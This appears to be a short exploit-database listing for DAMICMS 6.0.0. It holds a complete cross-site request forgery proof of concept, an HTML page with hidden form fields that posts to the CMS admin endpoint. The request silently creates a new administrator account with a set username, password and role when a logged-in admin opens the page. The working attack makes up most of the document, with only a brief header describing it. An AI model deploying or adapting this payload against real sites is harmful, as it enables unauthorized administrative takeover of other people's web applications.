damicms 6.0.0 crosssite request forgery (add admin)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
<!-- # Exploit Title: DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin) # Date: 2018-06-30 # Exploit Author: bay0net # Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9248562.html # Software Link: https://www.damicms.com/Down# # Version: DAMICMS_V6.0.0 # CVE : N/A # DamiCMS v6.0.0 allows CSRF via admin.php?s=/Admin/doadd to add an administrator account. # The payload for attack is as follows. --> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://Target/dami/admin.php?s=/Admin/doadd" method="POST"> <input type="hidden" name="username" value="test22" /> <input type="hidden" name="password" value="test22" /> <input type="hidden" name="role_id" value="1" /> <input type="hidden" name="Submit" value="添加" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Damicms 6.0.0 crosssite request forgery (add admin) Vulnerability / Exploit Source : Damicms 6.0.0 crosssite request forgery (add admin)